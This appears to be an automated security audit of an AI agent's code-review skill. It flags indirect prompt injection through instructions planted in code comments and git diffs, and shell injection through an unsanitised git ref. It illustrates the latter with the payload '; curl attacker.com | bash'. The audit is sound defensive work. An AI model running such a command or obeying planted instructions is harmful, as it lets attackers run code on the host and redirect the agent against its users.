code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Categories: PROMPT_INJECTION, COMMAND_EXECUTION
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is designed to ingest and analyze untrusted external content (Go source code and git diffs) for security and performance audits. There are no boundary markers or instructions to treat the analyzed code as data rather than instructions. An attacker could embed malicious instructions within code comments to manipulate the review report or influence the agent's subsequent actions.
- Ingestion points: git diff outputs and user-specified files/functions.
- Boundary markers: Absent. The agent is not instructed to ignore embedded instructions in the code.
- Capability inventory: Performs security audits, architectural analysis, and provides high-influence recommendations.
- Sanitization: None provided in the skill definition.
- Command Execution (MEDIUM): The skill instructs the agent to run "git diff <ref>~1..<ref>", where <ref> is a user-supplied string. If the execution environment does not strictly sanitize this input, it could be exploited for shell command injection (e.g., providing a ref like "; curl attacker.com | bash").
Recommendations
- AI detected serious security threats
Audit Metadata